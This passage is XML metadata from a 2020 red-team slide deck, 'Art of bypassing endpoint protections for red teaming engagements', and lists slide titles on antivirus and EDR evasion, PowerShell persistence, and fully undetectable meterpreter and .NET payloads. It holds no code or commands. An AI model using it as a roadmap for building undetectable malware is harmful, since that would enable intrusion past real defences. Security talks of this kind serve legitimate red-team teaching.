      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Antivirus can break you in the engagement</vt:lpstr>
      <vt:lpstr>Antivirus Evasion Tools</vt:lpstr>
      <vt:lpstr>The problem ….</vt:lpstr>
      <vt:lpstr>The problem</vt:lpstr>
      <vt:lpstr>Running a malware </vt:lpstr>
      <vt:lpstr>Advanced EDR Mutex detection</vt:lpstr>
      <vt:lpstr>Fun with Mutex</vt:lpstr>
      <vt:lpstr>Malware persistence techniques </vt:lpstr>
      <vt:lpstr>Regular techniques using PowerShell</vt:lpstr>
      <vt:lpstr>Evading using PowerShell</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerShell Demo…..</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Demo of FUD meterpreter payload using C/C++</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Red teaming Vs Real world</vt:lpstr>
      <vt:lpstr>Yara everywhere </vt:lpstr>
      <vt:lpstr>Behavior Analysis Malware Detection</vt:lpstr>
      <vt:lpstr>NjRAT Vs The World!</vt:lpstr>
      <vt:lpstr>.Net FUD</vt:lpstr>
      <vt:lpstr>FUD using .NET DEMO</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Conclusions </vt:lpstr>
      <vt:lpstr>References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Art of bypassing endpoint protections for red teaming engagements</dc:title>
  <dc:creator>Nabbo, Jameel</dc:creator>
  <cp:lastModifiedBy>Nabbo, Jameel</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-08-22T14:19:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08-22T19:03:23Z</dcterms:modified>
</cp:coreProperties>
</file>